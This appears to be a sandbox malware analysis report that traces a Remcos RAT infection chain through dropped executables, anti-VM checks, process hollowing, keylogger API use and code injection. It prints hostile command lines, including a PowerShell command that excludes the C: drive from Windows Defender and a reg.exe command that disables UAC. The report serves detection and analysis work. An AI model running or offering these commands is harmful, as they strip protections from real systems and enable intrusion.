                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\5.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\4.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOGPFAULTERRORBOX

                    Malware Analysis System Evasion:

                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Delayed program exit found
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040D0FF Sleep,ExitProcess,4_2_0040D0FF
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe TID: 7120Thread sleep count: 60 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5420Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\SysWOW64\cmd.exe TID: 1288Thread sleep count: 878 > 30
                    Source: C:\Windows\SysWOW64\cmd.exe TID: 1288Thread sleep time: -10536000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe TID: 5968Thread sleep time: -57000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\bin.exe TID: 6184Thread sleep count: 60 > 30
                    Source: C:\Users\user\AppData\Local\Temp\5.exe TID: 5480Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\5.exe TID: 5628Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\4.exe TID: 5356Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\4.exe TID: 5356Thread sleep time: -3870000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\4.exe TID: 5356Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6420Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 5772Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 5424Thread sleep time: -140000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2920Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 5436Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\4.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,4_2_00416A9F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\5.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\4.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5647
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2789
                    Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 878
                    Source: C:\Users\user\AppData\Local\Temp\21.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll
                    Source: C:\Users\user\AppData\Local\Temp\21.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\SQLite3_StdCall.dll
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\5.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\4.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\4.exeThread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 120000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 140000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 300000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00406AEE SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,4_2_00406AEE
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
                    Source: remcos.exe, 0000000D.00000002.938213946.0000000002946000.00000004.00000010.sdmpBinary or memory string: od_VMware_SATA_CD00#5&28
                    Source: bin.exe, 00000003.00000003.706568314.0000000000D66000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmp, bin.exe, 00000003.00000003.706516335.0000000000D61000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.932580225.0000000000D67000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.706451948.0000000000D34000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000003.753230553.00000000006E9000.00000004.00000001.sdmp, remcos.exe, 0000000D.00000003.752833518.000000000295A000.00000004.00000010.sdmp, remcos.exe, 0000000D.00000003.753110347.00000000029D7000.00000004.00000010.sdmp, remcos.exe, 0000000D.00000002.936555212.00000000006E9000.00000004.00000020.sdmp, remcos.exe, 0000000D.00000002.938601311.00000000029E6000.00000004.00000010.sdmp, remcos.exe, 0000000D.00000003.752944433.00000000029C8000.00000004.00000010.sdmpBinary or memory string: Hyper-V RAW
                    Source: remcos.exe, 0000000D.00000002.936555212.00000000006E9000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy\
                    Source: bin.exe, 00000003.00000003.684219433.0000000000D12000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.685243322.0000000000D18000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.684299780.0000000000D0E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: bin.exe, 00000003.00000002.932281171.0000000000CEA000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW`
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00405250
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00405C22 FindFirstFileA,FindClose,1_2_00405C22
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040A047 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040A047
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00418144 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,4_2_00418144
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040A262 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040A262
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00406360 FindFirstFileW,FindNextFileW,4_2_00406360
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040783D __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_0040783D
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00407C95 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,4_2_00407C95
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00447D49 FindFirstFileExA,4_2_00447D49
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00415DC8 FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00415DC8
                    Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile Volume queried: C:\Users\user\AppData\Roaming\Microsoft\Windows FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile Volume queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates FullSizeInformation
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405C49
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC2402 mov eax, dword ptr fs:[00000030h]1_2_6EDC2402
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC26C7 mov eax, dword ptr fs:[00000030h]1_2_6EDC26C7
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC2616 mov eax, dword ptr fs:[00000030h]1_2_6EDC2616
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC2744 mov eax, dword ptr fs:[00000030h]1_2_6EDC2744
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDC2706 mov eax, dword ptr fs:[00000030h]1_2_6EDC2706
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043DE2E mov eax, dword ptr fs:[00000030h]4_2_0043DE2E
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB17D3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_6EDB17D3
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0044901D GetProcessHeap,4_2_0044901D
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\5.exeMemory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_6EDB2A42 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6EDB2A42
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043060E SetUnhandledExceptionFilter,4_2_0043060E
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043047C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043047C
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0043753F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0043753F
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00430A6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00430A6C

                    HIPS / PFW / Operating System Protection Evasion:

                    Allocates memory in foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 1D0000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 1F0000 protect: page read and write
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeMemory written: C:\Users\user\Desktop\xxTzyGLZx5.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMemory written: C:\Users\user\AppData\Roaming\Remcos\remcos.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\21.exeMemory written: C:\Users\user\AppData\Local\Temp\21.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\5.exeMemory written: C:\Users\user\AppData\Local\Temp\5.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\4.exeMemory written: C:\Users\user\AppData\Local\Temp\4.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Users\user\AppData\Roaming\Windows Update.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00414B29 CreateProcessW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,4_2_00414B29
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: 1D010E
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
                    Sample uses process hollowing technique
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 1D0000
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 1F0000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    .NET source code references suspicious native API functions
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 40.2.5.exe.4970000.15.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, RunPE.cs Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe 4_2_0040FB05
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exe Process created: C:\Users\user\Desktop\xxTzyGLZx5.exe "C:\Users\user\Desktop\xxTzyGLZx5.exe"
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" 0
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exe Process created: C:\Users\user\AppData\Local\Temp\rem9090sta.exe "C:\Users\user\AppData\Local\Temp\rem9090sta.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\moyvwyrrsmhoowrqsha"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wilgxqclgvztqcfubsndyj"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe Process created: C:\Users\user\AppData\Roaming\Remcos\dwn.exe "C:\Users\user\AppData\Roaming\Remcos\dwn.exe"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exe Process created: C:\Users\user\AppData\Local\Temp\21.exe "C:\Users\user\AppData\Local\Temp\21.exe" 0
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exe Process created: C:\Users\user\AppData\Local\Temp\5.exe "C:\Users\user\AppData\Local\Temp\5.exe" 0
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exe Process created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\21.exe Process created: C:\Users\user\AppData\Local\Temp\21.exe "C:\Users\user\AppData\Local\Temp\21.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\5.exe Process created: C:\Users\user\AppData\Local\Temp\5.exe "C:\Users\user\AppData\Local\Temp\5.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\4.exe Process created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\5.exe Process created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2132
